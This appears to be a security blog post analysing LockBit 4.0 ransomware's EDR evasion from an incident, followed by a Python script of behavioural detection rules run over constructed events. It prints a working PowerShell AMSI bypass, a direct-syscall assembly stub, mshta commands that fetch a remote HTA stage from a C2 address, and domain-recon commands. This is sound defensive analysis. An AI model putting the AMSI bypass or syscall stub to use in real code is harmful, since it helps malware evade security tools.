LockBit is back. After a brief period of disruption following Operation Cronos in early 2024, the ransomware group has resurfaced with a significantly upgraded variant — LockBit 4.0 — that employs a battery of new techniques specifically engineered to defeat modern endpoint detection and response (EDR) tooling.

This post is a technical breakdown of the evasion mechanisms we observed during a live incident response engagement. We'll cover process injection techniques, AMSI bypass methods, and how the group is leaning heavily into living-off-the-land (LOTL) execution to blend into legitimate system activity.

"LockBit 4.0 represents the most sophisticated version of this ransomware family to date — both in terms of its technical capability and its operational security posture."

Initial access and staging

In the incident we analyzed, initial access was achieved through a phishing email carrying a malicious LNK file disguised as an invoice. When opened, the shortcut launched mshta.exe, the Microsoft-signed HTML Application host, with the URL of a remote HTA payload: a classic LOTL technique in which a trusted Windows binary does both the fetch and the script execution, so the first stage is attributable to a legitimate system process rather than to an attacker-supplied executable.

The staging phase was notably patient. After initial access the implant stayed quiet for approximately 72 hours, likely to sit out behavioral engines that flag a burst of post-exploitation activity immediately after a new process appears. The only activity in that window was low-volume environment reconnaissance.

EDR evasion techniques

1. Direct syscall invocation

LockBit 4.0 sidesteps user-mode EDR hooks by executing the syscall instruction from its own stubs instead of calling through the Nt* functions exported by ntdll.dll, which is where user-mode EDR sensors place their inline hooks. The complication is that system service numbers (SSNs) change between Windows builds and cannot be hardcoded. The technique known as "Hell's Gate" reads each SSN out of the still-intact stub in ntdll at runtime (the mov eax, imm32 that follows mov r10, rcx); its "Halo's Gate" refinement handles stubs the EDR has already overwritten with a jmp by reading a neighbouring clean stub and correcting for the fixed 32-byte stride between stubs, which are laid out in ascending SSN order.

; Direct syscall stub (simplified, x64). The stub lives in the payload's own memory, so execution
; never passes through the hooked NtAllocateVirtualMemory in ntdll.dll.
NtAllocateVirtualMemory_stub:
  mov r10, rcx      ; the kernel expects the first argument in r10 (rcx is clobbered by syscall)
  mov eax, 0x18     ; system service number; 0x18 is NtAllocateVirtualMemory on common Windows 10 x64
                    ; builds, but it varies between builds, so the payload patches this immediate at runtime
  syscall
  ret

This approach is effective because the hooked ntdll functions are never executed; the transition to the kernel happens from attacker-controlled memory. Kernel-side telemetry is unaffected, since the kernel still services the call: EDRs that rely on kernel callbacks and the ETW Threat Intelligence provider still observe the resulting memory allocations, protection changes and thread creations, and several also flag a syscall whose return address lies outside ntdll.dll. Products that depend only on user-mode hooks, however, are completely blind to it.

2. Process hollowing into a signed binary

The ransomware payload was injected into a suspended instance of svchost.exe, a Microsoft-signed Windows binary, using classic process hollowing: the original image is unmapped from the suspended process, the malicious PE is written into the vacated region, the entry point in the main thread's context is repointed at it, and the thread is resumed. The signature vouches only for the file on disk; what actually runs bears no relation to it. The practical tell is lineage: a legitimate svchost.exe is started by services.exe with a -k service-group argument, so an instance with any other parent or with a bare command line deserves scrutiny.

3. AMSI bypass via memory patching

For its PowerShell-based components, LockBit 4.0 disables AMSI inside the PowerShell process at runtime so that script content is never flagged. The variant below does not patch amsi.dll itself; it uses .NET reflection to overwrite the private static amsiContext field of System.Management.Automation.AmsiUtils, the handle PowerShell hands to AmsiScanBuffer, with a garbage value. PowerShell treats a failed scan as a non-detection, so once the handle is invalid every subsequent scan fails open. The wildcard type and field names exist to dodge string matches on "AmsiUtils" and "amsiContext". This is a well-documented technique, but it remains effective against a surprising number of enterprise deployments; note that the script block itself is still captured by PowerShell Script Block Logging (event 4104), which is where to hunt for it.

# Recovered PowerShell AMSI bypass: corrupts the amsiContext handle via reflection.
# Wildcards avoid the literal "AmsiUtils"/"amsiContext" strings that signature-based detections key on.
$a = [Ref].Assembly.GetTypes()                  # every type in System.Management.Automation
$b = $a | ?{$_.Name -like "*iUtils"}            # -> System.Management.Automation.AmsiUtils
$c = $b.GetFields('NonPublic,Static')           # private static fields, including amsiContext
$d = $c | ?{$_.Name -like "*Context"}           # -> the amsiContext field (an IntPtr handle)
$d.SetValue($null,[IntPtr]2)                    # overwrite the handle with garbage; later scans fail open

Lateral movement and encryption

Once established on the initial host, LockBit 4.0 used net view, nltest, and WMI queries to enumerate domain hosts. Credential access was achieved via a memory-only Mimikatz variant delivered over the established C2 channel, with credentials used to move laterally via SMB and WinRM.

Encryption itself uses a hybrid AES-256 + RSA-2048 scheme: each file is encrypted with its own AES key, and that key is then encrypted with the attacker's RSA public key. Because only the RSA-wrapped form of each AES key remains on the victim, decryption without the attacker's private key is computationally infeasible, and recovery comes down to offline backups or the key itself.

Defensive recommendations

Indicators of compromise

The following IOCs were observed during this incident. Note that LockBit infrastructure rotates frequently — treat these as behavioral patterns rather than static blocklist entries.

C2 domains (observed):
  update-cdn[.]io
  telemetry-svc[.]net

File hashes (SHA-256):
  a3f1e2b4c9d0… (LNK dropper)
  8d72c1a0f4e3… (hollowed svchost payload)

Registry persistence:
  HKCU\Software\Microsoft\Windows\CurrentVersion\Run
  Value: "SvcHostHelper" → mshta.exe http://[c2]/stage2.hta
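Pulling the behaviors above together, the following is an added example of detection logic, written for this page rather than taken from the engagement or from any vendor product. It runs over a handful of constructed Sysmon-style process-creation and registry events plus one PowerShell 4104 script block, and encodes the mshta-from-LNK initial access, the svchost.exe lineage anomaly from the hollowing step, the net view / nltest domain enumeration, the reflective AMSI tamper, and the Run-key persistence pattern. The address 198.51.100.7 is a documentation IP standing in for the C2; the event shapes and field names are simplified assumptions, not any product's schema.

```python
"""Behavioural detections for the tradecraft in this write-up, run over constructed telemetry."""
from __future__ import annotations
import re

# Constructed events in a flattened Sysmon/PowerShell-log shape (field names are an assumption, not a product schema).
EVENTS = [
    {"id": 1, "type": "process", "image": r"C:\Windows\explorer.exe",
     "parent": r"C:\Windows\System32\userinit.exe", "cmdline": "explorer.exe"},
    {"id": 2, "type": "process", "image": r"C:\Windows\System32\mshta.exe",          # LNK -> mshta -> remote HTA
     "parent": r"C:\Windows\explorer.exe", "cmdline": "mshta.exe http://198.51.100.7/invoice.hta"},
    {"id": 3, "type": "process", "image": r"C:\Windows\System32\svchost.exe",        # legitimate service host
     "parent": r"C:\Windows\System32\services.exe", "cmdline": "svchost.exe -k netsvcs -p"},
    {"id": 4, "type": "process", "image": r"C:\Windows\System32\svchost.exe",        # hollowing target
     "parent": r"C:\Windows\System32\mshta.exe", "cmdline": "svchost.exe"},
    {"id": 5, "type": "process", "image": r"C:\Windows\System32\net.exe",
     "parent": r"C:\Windows\System32\svchost.exe", "cmdline": "net view /domain"},
    {"id": 6, "type": "process", "image": r"C:\Windows\System32\nltest.exe",
     "parent": r"C:\Windows\System32\svchost.exe", "cmdline": "nltest /dclist:corp"},
    {"id": 7, "type": "scriptblock", "text": "Get-ChildItem C:\\Users | Sort-Object Length"},  # benign
    {"id": 8, "type": "scriptblock", "text": '$a=[Ref].Assembly.GetTypes();$b=$a|?{$_.Name -like "*iUtils"};'
             "$c=$b.GetFields('NonPublic,Static');$d=$c|?{$_.Name -like \"*Context\"};$d.SetValue($null,[IntPtr]2)"},
    {"id": 9, "type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value": "SvcHostHelper", "data": "mshta.exe http://198.51.100.7/stage2.hta"},
]

LOLBIN_REMOTE = re.compile(r"(?i)\b(mshta|rundll32|regsvr32)(\.exe)?\b.*\bhttps?://")
RECON_TOOLS = {"net.exe": ("view",), "nltest.exe": ("/dclist", "/domain_trusts"), "wmic.exe": ("/node:",)}
# The bypass on this page avoids literal 'AmsiUtils'/'amsiContext'; match the reflection shape, not the names.
AMSI_REFLECTION = [
    re.compile(r"(?i)\[Ref\]\.Assembly\.GetTypes\(\)"),
    re.compile(r"(?i)NonPublic\s*,\s*Static"),
    re.compile(r"(?i)amsi|\*iUtils|\*Context|\*InitFailed"),
]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def rule_lolbin_remote_payload(ev: dict) -> bool:
    """Signed script host launched with a URL on its command line (mshta fetching the HTA stage)."""
    return ev["type"] == "process" and LOLBIN_REMOTE.search(ev["cmdline"]) is not None


def rule_svchost_lineage(ev: dict) -> bool:
    """svchost.exe not started by services.exe, or lacking a -k service group: the shell used for hollowing.
    Heuristic: a few Windows components spawn svchost themselves, so tune the parent allow-list per estate."""
    if ev["type"] != "process" or basename(ev["image"]) != "svchost.exe":
        return False
    return basename(ev["parent"]) != "services.exe" or "-k" not in ev["cmdline"].split()


def rule_domain_recon(ev: dict) -> bool:
    """Built-in enumeration tools with domain-scoped arguments (net view, nltest /dclist, wmic /node)."""
    if ev["type"] != "process":
        return False
    tokens = RECON_TOOLS.get(basename(ev["image"]), ())
    return any(t in ev["cmdline"].lower() for t in tokens)


def rule_amsi_tamper(ev: dict) -> bool:
    """4104 script block that reflects into private static state and names an AMSI artefact, even via wildcards."""
    return ev["type"] == "scriptblock" and all(p.search(ev["text"]) for p in AMSI_REFLECTION)


def rule_run_key_lolbin(ev: dict) -> bool:
    """Run-key value whose data launches a script host against a remote URL."""
    return (ev["type"] == "registry" and ev["key"].lower().endswith(r"\currentversion\run")
            and LOLBIN_REMOTE.search(ev["data"]) is not None)


RULES = {
    "lolbin_remote_payload": rule_lolbin_remote_payload,
    "svchost_lineage": rule_svchost_lineage,
    "domain_recon": rule_domain_recon,
    "amsi_tamper": rule_amsi_tamper,
    "run_key_lolbin": rule_run_key_lolbin,
}


def run_rules(events: list[dict]) -> list[tuple[str, int]]:
    """Return (rule name, event id) for every rule that fires on every event."""
    return [(name, ev["id"]) for ev in events for name, rule in RULES.items() if rule(ev)]


if __name__ == "__main__":
    for name, event_id in run_rules(EVENTS):
        print(f"{name:24} -> event {event_id}")
```

None of these rules depends on the rotating C2 domains or file hashes listed above; each keys on a relationship (parent/child, image/argument, registry key/data, script shape) that survives infrastructure changes, which is the sense in which the IOCs should be treated as behavioral patterns.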

LockBit 4.0 represents a clear escalation in the technical capability of ransomware-as-a-service operations. None of the techniques documented here is novel in isolation, but their combination (direct syscalls, process hollowing into a signed binary, and AMSI tampering) forms a layered evasion chain that defeats many enterprise security stacks.

The most effective defense remains a defense-in-depth posture: kernel telemetry, network segmentation, least-privilege enforcement, and — critically — a well-rehearsed incident response capability. Detection without response is theater.